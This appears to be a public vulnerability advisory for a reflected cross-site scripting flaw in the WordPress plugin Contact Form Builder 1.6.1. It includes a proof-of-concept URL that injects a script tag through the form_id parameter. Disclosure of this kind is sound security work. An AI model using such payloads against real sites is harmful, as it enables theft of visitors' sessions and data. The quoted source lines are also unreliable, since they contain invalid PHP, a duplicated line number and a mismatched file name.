Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting

2020.03.24

Milad Karimi (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

* Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting
* Google Dork: N/A
* Date: 2020.03.23
* Exploit Author: Milad Karimi
* Vendor Homepage: https://wordpress.org/plugins/contact-forms-builder/
* Software Link: https://wordpress.org/plugins/contact-forms-builder/
* Category : webapps
* Version: 1.6.1
* Tested on: windows 10 , firefox
* CVE : N/A
Vulnerable page :
/edit-form.php
Vulnerable Source:
1094: echo echo $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
130: if(isset($_GET['form_id']))
1094: if(!empty($cancel_redirect_url)) else
POC :
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.